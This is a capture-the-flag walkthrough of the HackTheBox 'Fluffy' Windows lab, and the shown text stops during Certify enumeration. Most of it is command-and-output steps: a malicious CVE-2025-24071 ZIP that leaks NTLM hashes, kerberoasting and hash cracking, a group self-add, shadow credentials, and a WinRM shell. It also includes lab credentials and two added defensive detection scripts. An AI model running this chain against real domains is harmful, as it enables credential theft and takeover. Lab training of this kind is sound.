Misc · Easy · Windows

HTB — Fluffy

CVE-2025-24071 abuses .searchConnector-ms files to capture NTLMv2 hashes. Relay attack and ADCS ESC4 escalate to Domain Admin.

May 28, 2025 · HackTheBox
#NTLM Relay #ADCS #CVE-2025-24071 #ESC4

As is common in real-life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 10:10 EDT
Nmap scan report for 10.10.11.69
Host is up (0.033s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-28 21:12:34Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:07+00:00; +7h00m01s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:08+00:00; +7h00m01s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:07+00:00; +7h00m01s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-28T21:14:08+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49729/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-28T21:13:27
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   21.16 ms 10.10.14.1
2   28.28 ms 10.10.11.69

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds
```

445 smb

```sh
nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
```

IT share

```sh
smbclient \\\\10.10.11.69\\IT -U fluffy.htb\\j.fleischman
Password for [FLUFFY.HTB\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May 19 10:27:02 2025
  ..                                  D        0  Mon May 19 10:27:02 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025
```

users

```sh
nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.69     445    DC01             Administrator                 2025-04-17 15:45:01 0       Built-in account for administering the computer/domain
SMB         10.10.11.69     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.69     445    DC01             krbtgt                        2025-04-17 16:00:02 0       Key Distribution Center Service Account
SMB         10.10.11.69     445    DC01             ca_svc                        2025-04-17 16:07:50 0        
SMB         10.10.11.69     445    DC01             ldap_svc                      2025-04-17 16:17:00 0        
SMB         10.10.11.69     445    DC01             p.agila                       2025-04-18 14:37:08 0        
SMB         10.10.11.69     445    DC01             winrm_svc                     2025-05-18 00:51:16 0        
SMB         10.10.11.69     445    DC01             j.coffey                      2025-04-19 12:09:55 0        
SMB         10.10.11.69     445    DC01             j.fleischman                  2025-05-16 14:46:55 0        
SMB         10.10.11.69     445    DC01             [*] Enumerated 9 local users: FLUFFY
```

bloodhound

```sh
sudo bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c all
zip -r fluffy.htb.zip *.json
```

kerberoasting

```sh
sudo ntpdate -u 10.10.11.69 && GetUserSPNs.py -dc-ip 10.10.11.69 fluffy.htb/j.fleischman -request-user ldap_svc
2025-05-28 17:55:57.087188 (-0400) +25199.421803 +/- 0.058239 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25199.421803
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name      MemberOf                                       PasswordLastSet             LastLogon  Delegation 
--------------------  --------  ---------------------------------------------  --------------------------  ---------  ----------
LDAP/ldap.fluffy.htb  ldap_svc  CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 12:17:00.599545  <never>               

[-] CCache file is not found. Skipping...
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$70107bf5...$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
```

ldap_svc

```sh
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$70107bf5...$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
```

```sh
smb: \> get Upgrade_Notice.pdf 
```

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability

Overview (NSFOCUS CERT): NSFOCUS CERT has detected that Microsoft recently released a security update to address a critical spoofing vulnerability in Windows File Explorer, identified as CVE-2025-24071. This vulnerability has a CVSS score of 7.5, indicating its severity. The issue arises from the implicit trust and automatic file parsing behavior of .library-ms files in Windows Explorer. An unauthenticated attacker can exploit this vulnerability by constructing RAR/ZIP files containing a malicious SMB path. Upon decompression, this triggers an SMB authentication request, potentially exposing the user's NTLM hash. PoC (Proof of Concept) exploits for this vulnerability are now publicly available, making it a current threat. Affected users are strongly advised to apply the patch immediately to mitigate the risk.

  • https://github.com/ThemeHackers/CVE-2025-24071
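The defensive counterpart to the advisory above is to catch such archives before a user extracts them. The scanner below is an added example written for this writeup (it is not code from the page, the linked PoC, or Microsoft): it walks a ZIP, picks out the descriptor types Explorer parses on sight, and reports any that point at a remote location. The archive members, the 203.0.113.10 host and the simplified descriptor XML are all constructed; the real library schema is more elaborate, which is why the scanner is namespace-agnostic and falls back to a plain text search.

```python
"""Scan a ZIP archive for Windows library / search-connector descriptors that
reference a remote (UNC or smb://) location, which is the pattern the
CVE-2025-24071 archives rely on to trigger an outbound SMB authentication.

Added example for this writeup, not code from the page, the ThemeHackers PoC
or Microsoft. Archive members, the 203.0.113.10 host and the simplified
descriptor XML are all constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Descriptor types Explorer parses on sight once they land in a folder.
SUSPECT_SUFFIXES = (".library-ms", ".searchconnector-ms")

# \\host\share... (UNC) or smb://host/... anywhere in the descriptor text.
REMOTE_PATH = re.compile(
    r"""(\\\\[^\\\s<>"']+\\[^\s<>"']*|smb://[^\s<>"']+)""", re.IGNORECASE)


def remote_locations(xml_bytes: bytes) -> list[str]:
    """Return every remote location a descriptor references.

    A namespace-agnostic XML walk looks at <url> elements first; if the file
    is not well-formed XML (or the walk finds nothing) a regex over the raw
    text is used instead, so a deliberately mangled file is still flagged.
    """
    found = []
    try:
        for el in ET.fromstring(xml_bytes).iter():
            local_tag = el.tag.rsplit("}", 1)[-1].lower()
            text = (el.text or "").strip()
            if local_tag == "url" and REMOTE_PATH.fullmatch(text):
                found.append(text)
    except ET.ParseError:
        pass
    if not found:
        text = xml_bytes.decode("utf-8", errors="replace")
        found = [m.group(0) for m in REMOTE_PATH.finditer(text)]
    return found


def scan_archive(data: bytes) -> list[dict]:
    """Inspect every member of an in-memory ZIP; one finding per remote path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(SUSPECT_SUFFIXES):
                continue
            for location in remote_locations(zf.read(info)):
                findings.append({"member": info.filename, "location": location})
    return findings


def build_sample_archive() -> bytes:
    """Constructed ZIP: a benign local descriptor and one pointing off-host."""
    benign = (b"<descriptor><simpleLocation>"
              b"<url>C:\\Users\\Public\\Documents</url>"
              b"</simpleLocation></descriptor>")
    remote = benign.replace(b"C:\\Users\\Public\\Documents",
                            b"\\\\203.0.113.10\\share")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed filler member")
        zf.writestr("Documents.library-ms", benign)
        zf.writestr("Upgrade_Notice.searchConnector-ms", remote)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_archive(build_sample_archive()):
        print(f"[!] {hit['member']} -> {hit['location']}")
```

Run it as-is to see the constructed archive flagged; on a mail gateway or file share the same `scan_archive` call would take the uploaded bytes. Note that the check is on the referenced location, not the file name, because the descriptor is only dangerous when it points somewhere that forces an authentication.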
```sh
git clone https://github.com/ThemeHackers/CVE-2025-24071.git
```

```sh
python3 exploit.py -f exploit -i 10.10.14.3

          ______ ____    ____  _______       ___     ___    ___    _____        ___    _  _      ___    ______   __  
         /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  | ____|      |__ \  | || |    / _ \  |____  | /_ | 
        |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) | | |__    ______ ) | | || |_  | | | |     / /   | | 
        |  |       \      /   |   __|  |______/ /  | | | |   / /  |___ \  |______/ /  |__   _| | | | |    / /    | | 
        |  `----.   \    /    |  |____       / /_  | |_| |  / /_   ___) |       / /_     | |   | |_| |   / /     | | 
         \______|    \__/     |_______|     |____|  \___/  |____| |____/       |____|    |_|    \___/   /_/      |_| 


                                                Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
                    by ThemeHackers

Creating exploit with filename: test.library-ms
Target IP: 10.10.11.69

Generating library file...
✓ Library file created successfully

Creating ZIP archive...
✓ ZIP file created successfully

Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
```
```sh
smbclient \\\\10.10.11.69\\IT -U fluffy.htb\\j.fleischman
smb: \> put exploit.zip
```

```sh
responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0


[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:08e3d40acb0bc8fc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
```

p.agila_ntlmv2.txt

```sh
p.agila::FLUFFY:08e3d40acb0bc8fc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
```

```sh
hashcat -m 5600 p.agila_ntlmv2.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6-851-g6716447df) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 6939/13942 MB (2048 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

P.AGILA::FLUFFY:08e3d40acb0bc8fc:2bc59ab3...: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:prometheusx-303
```

creds

p.agila:prometheusx-303

```sh
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.10.11.69"
```

```sh
net rpc group members "SERVICE ACCOUNTS" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.10.11.69"
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc
```

```sh
sudo ntpdate fluffy.htb && python3 /opt/linux/targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303'
2025-05-28 21:03:34.481573 (-0400) +25201.149369 +/- 0.009700 fluffy.htb 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.149369
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$24423113...$652cbdaf683cad62559ea9f37cf921b556b22e619ad607161626f51119efcaa50daf1839d45cc431bfba66b6386b2899ca68c331834abc4a05f5ffdfd557189ddac2674689bee91668ec02fa21fda56e100e14f0a0571281d959b2f5fc1be08ec282aaaef4f01c7ec65ef651963d4ef319763df6b54ca433fd97ba764a06ef3a6d44f10a3b8cf3d5fef66cb89bb4109fd1d2c56b28d4cb99e374c452c84596145fd2a63e83343cade04b72f62254e2ab38e862e658f2a24869c8115dd4cb57eb80ec3980d67027a272213583cf4963b6a0bfc38ed505925f7390c8a1eb13f0a431a4041fc6b935643f67d47a497ebfbe96d7b113241a22b3126b0e47c6c33e0a1a929f1979aa9ade57e0b755cc79a09ad62afcc5f6283ea13cd473fe3653e7dc7c38dac67dce0dfdd849666d82a29328c0826b5abbbb4facc56a7aa925a0ac1f9b21ff2fa610a05248444d7902df70b3241ae23ccb186926bb4b646bc1db25d577f24808c04c9758f34884028cc59143af2978722f08210dd1eec55106bce1c61e57faabb05a716524e9af4b6a862ade7d0c872d74dfc621f60e4960b206a511af09e708dacb189d3dced6cc181dc2fd821348f4506bb81cb5ec847fb8a0765cad91853b48d1965439461f9de049a09156ec5a6cb22bd4f21d425e181edd86a3acadb8d30dd6566fd9016a19023e8a4e98eba1d6ac19d2ce9bddb043dc39bbd793acf54537b7470e51ccaa2930385b3c2cbf80942c4d18f09e6d42d52119e5145e39f483fab187bfb6c631d23e66000496f70b1b885bcedf3e79f5faba737784c8a6986ad41f4e44dc6ec3f283f37c8dfe589c8eafc322e82eebdb742ca473fa497737ba5cd606f5985d4ea52c836ca9125dfb8fd4a91f0ff7dc70173cb3e289dda025ead85bb765f70cda2374193f4b24f41af42abb2887fd1229ed699c7a4e935eda775e4246e693fe76b6db9e0b5abd4e0b534bc8d9782e29e8535c2656768db272791b67a7b4399f50a760d9c30e2b97b49cdcd33c47a8662d0dc47ed16107512f0e3f693b7d8e00822efd5e23ab021d1987fe42aa2f41fe6b03975376701e4e3a23dedbee1acb262f3bdb211257e1452dd90ae3f3039d1b0e1ddd98223baf64ec1135f1585ff568b1660c4d7abafb74957b3202b370b4a979728ec6c9bbb869d8af8e8c2377a4057e1e149f620af17c95735a8868ca4e6698090e7510747d5b3673c9d197f52697fa8812864bda759e2e515bee0a816e3047c410501ee298d4e59cfe9eff19a358a5ec986d593e94aba9498d7753456b8a5e3c51706dda404a9fbae518ac9b9836d7376c3145a6dcc5d04e289f212b7cbcc0317521ee5ad235167ba91e27ae4fedda9854dfd443e61222b1e445bbc2a4bd0db2769f58a257e5aa597d449bd41c9620fe4903daa1dc7b8e5e2fc3196755685be318ba99d2e058cc3ee6ab51484fefedaab7abdeed573b9a56dbe6d5b156545f28a186bb39be524a60a1c3bcc78ebf
[+] Printing hash for (ldap_svc)
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$16994c2a...$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
[+] Printing hash for (winrm_svc)
$krb5tgs$23$*winrm_svc$FLUFFY.HTB$fluffy.htb/winrm_svc*$673ed5b9...$c8b8713be56857f86811a349df44f184f5a3911c3ed36b0d9615ceb3f404c8e878e9fa9de2f09e6aedbfed8c959c282cfd3747d9abbe82a93dbaed431c0c3ae23d819b34873d8e10d84c2f2e98dbb23f77b4c9f138151a60f4c47f47fe5eba1dca6942fda967a7c06c941a05ad2739b276f3e6a3fba81ff0c147a6cf5cda0a55c484f34f121e3abf3f68622ed1b89277abeee7c161cf322f48af7c6b2fb2f55094f0ec33cc50bd2b02241448dc342021243a547788804b8f468ee86aef447e893202c2762e9e539b9ecc34d54488a3321f34b72dff448379142eed2ebfb049ff42e9265fc2947f0fe1b56b80fd7d2922b5c07b148fc8ea253242dcff86e139459edb3ad49257a22535913dc695819c06e0bff957cf4a474baf00d348bb8960f98bf635b81773a34863e3b7fb86e5f27ef896bf453705f9e3b2926b9b1bc490141f97bb0151dfe70074d3da680c7074842ec1f9b00f06ee1e9dadf3ef9fb71297ca5a674f41d0c96ac9bba6dd5825fbae763f37871603671d9ba4656c73061d157a28ac536931420ee787a615f18857f055c1110f922cc9de1a65db027c38c16decb8aa923292e1558bc8ac0c1f55f81bcfdf241c2cefe0c5b84b2b981b413e68697da6e54d4def546f968bcd0f95f6d13b085ba3643fe5b6edd7e19e27cbe2e7d1de76e44fe6e620dcf6508de18d8beb411a5f38c21b27e012dd9e2f2f0b65c07bb2aad5a61250cbcd3e3b93387a09d349da31a419f0d1612f898be3f96755c874339828bb2d5dde76c753c2e70b4c4f6c7dc8656950f4b1684c9cb6d26673eddbc7b35d73ab95da590c8f4384f7a0548c4b70745a304f8daa3fa3ea283e1346020044263a99780250fb4dbd38fef211988dcd75cb9f783bc657fddd2192b87341194ae8d377cd42366d801d588a28141b0bb1758a35247c98424e0971782ab91bf63e3b1643ebe2aef00646c5e0c28abc9edce80b7d1cfa8049c3297b75944ee673791fb4416c3f6543d022ad589fb62fa416f5de1c85733967e0072fb6a360a6986c1d1788266949510e8251a41bbcc58984db44a9f228880562ba3ecab97fb3505a68c47617856bfebf8109a28473847c9e99a426c6625b2bb712ba17390da67cb5e311edbb5c44db89168a451e6f203f256e55b51ed153eade0e02eda3e4cf2be405d46ee8ce37e4e26ec07ce1f285bd7a2a0b815cc807c07fbb6d1522abd0491b38cbc5b25cea64425f049617f97ab2ac4fedf9ee2f96a2b83eaca137532a95d8ffc0ce41bbc1ac4f7d2a2a0816b77ec994764f746faece58595aa41cff16e269077bde6d5933f928b4b1a8ca7429dcdfb4d33858d816e73cbf78cb3c5bad33993518e7d62cd09a11c38eff0eea78cbe44b670b8003a26937387d5f97c97e8e92fe7f779d9596d0fd2afd44892b79de90b1bfcce6f36a60ca69792ab3eefcec8c7a9014b1032094a69b5323d9d0e58a1e544a346577f8affc44292316f79ac65c6274ab5e8e23bd
```

Re-run bloodhound-python with p.agila's credentials now that the account has been added to the SERVICE ACCOUNTS group, and upload the new collection to BloodHound for analysis.

```sh
sudo bloodhound-python -u 'p.agila' -p 'prometheusx-303' -ns 10.10.11.69 -d fluffy.htb -c all
zip -r fluffy2.htb.zip *.json
```

shadow credentials on winrm_svc (p.agila has GenericWrite over it)

```sh
pywhisker -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6fc43ad4-f4d0-bf16-88f4-257618ed6e5d
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: a0nK13DR.pfx
[*] Must be used with password: a3PTZIxrbeqHVU9k1LTN
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```
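Both directory changes made so far (p.agila adding herself to SERVICE ACCOUNTS, and the msDS-KeyCredentialLink write pywhisker just performed) leave records in the DC's Security log. The detector below is an added example written for this writeup, not code from the page or from pywhisker: it evaluates forwarded events, raising on membership changes to a watchlist of sensitive groups (Event IDs 4728/4732/4756) and on any write to msDS-KeyCredentialLink or msDS-AllowedToActOnBehalfOfOtherIdentity (Event ID 5136, which only fires when "Audit Directory Service Changes" is on and the attribute carries a SACL). The event records and the group watchlist are constructed for this lab domain.

```python
"""Detection logic for the two directory changes made in this section: a
principal added to a sensitive group (Event ID 4728/4732/4756) and a write
to msDS-KeyCredentialLink, the attribute pywhisker populates (Event ID 5136,
which needs 'Audit Directory Service Changes' and a SACL on the attribute).

Added example for this writeup, not from the page or any tool it uses. The
events are constructed to mirror what a SIEM forwards from a DC; the group
watchlist is an assumption for this lab domain.
"""
from typing import Optional

SENSITIVE_GROUPS = {"service accounts", "domain admins", "enterprise admins",
                    "administrators", "cert publishers", "account operators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}        # global / local / universal group
DS_OBJECT_MODIFIED = 5136
WATCHED_ATTRIBUTES = {"msds-keycredentiallink",
                      "msds-allowedtoactonbehalfofotheridentity"}


def cn_of(distinguished_name: str) -> str:
    """'CN=p.agila,CN=Users,DC=fluffy,DC=htb' -> 'p.agila'."""
    first = distinguished_name.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert for one event, or None when nothing matched."""
    actor = event.get("SubjectUserName", "?")
    if event.get("EventID") in GROUP_ADD_EVENTS:
        group = event.get("TargetUserName", "")
        if group.lower() in SENSITIVE_GROUPS:
            member = cn_of(event.get("MemberName", ""))
            return {"rule": "sensitive-group-add", "severity": "high",
                    "actor": actor, "group": group, "member": member,
                    # a user granting herself membership is the classic ACL-abuse tell
                    "self_add": member.lower() == actor.lower()}
    if event.get("EventID") == DS_OBJECT_MODIFIED:
        attr = event.get("AttributeLDAPDisplayName", "").lower()
        if attr in WATCHED_ATTRIBUTES:
            # OperationType %%14674 = Value Added, %%14675 = Value Deleted
            return {"rule": "keycredential-or-rbcd-write", "severity": "high",
                    "actor": actor, "target": cn_of(event.get("ObjectDN", "")),
                    "attribute": event.get("AttributeLDAPDisplayName"),
                    "added": event.get("OperationType") == "%%14674"}
    return None


def run(events: list) -> list:
    """Evaluate a batch of events and keep only the alerts."""
    return [alert for alert in map(evaluate, events) if alert]


# Constructed events that mirror this writeup's actions plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "j.fleischman"},
    {"EventID": 4728, "SubjectUserName": "p.agila", "TargetUserName": "Service Accounts",
     "TargetDomainName": "FLUFFY", "MemberName": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 4728, "SubjectUserName": "Administrator", "TargetUserName": "Sales",
     "TargetDomainName": "FLUFFY", "MemberName": "CN=new hire,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "p.agila", "ObjectClass": "user",
     "ObjectDN": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

The `self_add` flag is the cheapest high-signal enrichment here: legitimate group changes are made by an admin on someone else's behalf, while an ACL-abuse chain almost always has the actor and the new member coincide. The attribute rule fires on additions and deletions alike, so a later clean-up of the KeyCredential is logged too.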

Generate a Kerberos TGT for winrm_svc with the PFX:

```sh
sudo ntpdate 10.10.11.69 && python3 /opt/linux/PKINITtools/gettgtpkinit.py fluffy.htb/winrm_svc -cert-pfx ./a0nK13DR.pfx -pfx-pass a3PTZIxrbeqHVU9k1LTN winrm_svc.ccache
2025-05-28 23:44:19.525707 (-0400) +25201.361630 +/- 0.009805 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.361630
2025-05-28 23:44:19,732 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-28 23:44:19,744 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-28 16:44:30,956 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-28 16:44:30,956 minikerberos INFO     5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047
INFO:minikerberos:5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047
2025-05-28 16:44:30,959 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
```

```sh
export KRB5CCNAME=/home/sake/htb-labs/Fluffy/winrm_svc.ccache
```

```sh
sudo ntpdate 10.10.11.69 & python3 /opt/linux/PKINITtools/getnthash.py -key 5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047 fluffy.htb/winrm_svc
[1] 173432
2025-05-28 23:53:04.987812 (-0400) +25201.372904 +/- 0.012582 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.372904
[1]  + done       sudo ntpdate 10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
33bd09dc...
```

```sh
evil-winrm -i 10.10.11.69 -u winrm_svc -H '33bd09dc...'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
```

user.txt

```sh
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
e0e4c0f2...
```

certify

```sh
*Evil-WinRM* PS C:\Users\winrm_svc> upload /home/sake/htb-labs/Fluffy/Certify.exe

Info: Uploading /home/sake/htb-labs/Fluffy/Certify.exe to C:\Users\winrm_svc\Certify.exe

Data: 232104 bytes of 232104 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\winrm_svc> .\Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=fluffy,DC=htb'

[*] Listing info about the Enterprise CA 'fluffy-DC01-CA'

    Enterprise CA Name            : fluffy-DC01-CA
    DNS Hostname                  : DC01.fluffy.htb
